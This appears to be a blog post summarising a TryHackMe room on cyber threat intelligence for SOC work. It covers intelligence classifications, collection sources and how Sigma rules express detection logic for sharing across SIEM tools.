In this post , we covered the concept of threat intelligence, how it’s performed and what are the IOCs collected during threat intelligence and how they are used and standarized to be implemented in SOC to hunt for threats and prevent future cyber attacks. This video is part of TryHackMe Threat Intelligence for SOC which is part of SOC Level 2.
Full blog post is here.
Definition of cyber threat intelligence
From blue team perspective, it’s the collection and analysis of tactics, techniques and procedures used by attackers to build detections.
From read team perspectives, it’s the emulation of adversaries TTPs and analysis of blue team’s ability to build detections based in IOCs and TTPs.
Red team collects TTPs from threat intelligence frameworks and related to a certain hacking group to create tools and emulate this hacking group’s behaviour in an engagement.
In cyber threat intelligence, we aim to answer the below questions with the help of threat intelligence
Who’s attacking you?
What are their motivations?
What are their capabilities?
What artefacts and indicators of compromise (IOCs) should you look out for?
Classifications of threat intelligence
Strategic Intel: High-level intel that looks into the organisation’s threat landscape and maps out the risk areas based on trends, patterns and emerging threats that may impact business decisions.
Technical Intel: Examines evidence and artefacts of attacks an adversary uses. Incident Response teams can use this intel to create a baseline attack surface to analyse and develop defence mechanisms.
Tactical Intel: Assesses adversaries’ tactics, techniques, and procedures (TTPs). This intel can strengthen security controls and address vulnerabilities through real-time investigations.
Operational Intel: Assesses an adversary’s specific motives and intent to perform an attack. Security teams may use this intel to understand the critical assets available in the organisation (people, processes, and technologies) that threat actors may target.
How threat intelligence is gathered?
Internal:
Vulnerability assessments and incident response reports.
Cyber awareness training reports.
System logs and events.
Community:
Web forums.
Dark web communities for cybercriminals.
External
Threat intel feeds (Commercial & Open-source)
Online marketplaces.
Public sources include government data, publications, social media, financial and industrial assessments.
What are sigma rules and what is the rule of Sigma in detection engineering?
Sigma is an open-source generic signature language developed to describe log events in a structured format. This allows for quick sharing of detection methods by security analysts.
For the expression of detection logic for various logs, the Sigma syntax offers a straightforward and potent framework. Proxy logs, Windows events, application logs, firewall logs, cloud events, Linux audit logs, and many other log types can have rules written for them by Sigma.
Sigma offers the vocabulary required to spell out detection logic and incorporate metadata useful for delving into warnings produced by your rules. Sigma helps you to better arrange and distribute detection rules you write to colleagues and threat intelligence networks.
Sigma’s most potent feature is that it was made to work with any search and detection software you already own. Sigma rules can be converted into Elastic, Splunk, Arcsight, Carbon Black, Graylog, NetWitness, Humio, Crowdstrike, Elastalert, and numerous other free and commercial formats using the Sigma converter tool. Vendor lock-in is avoided and you may utilize your detection logic for searches in your investigations, as a foundation for threat hunting inquiries, and across other detection systems by saving your rules in Sigma syntax.
Room Answers | TryHackMe Threat Intelligence for SOC
Room answers can be found here.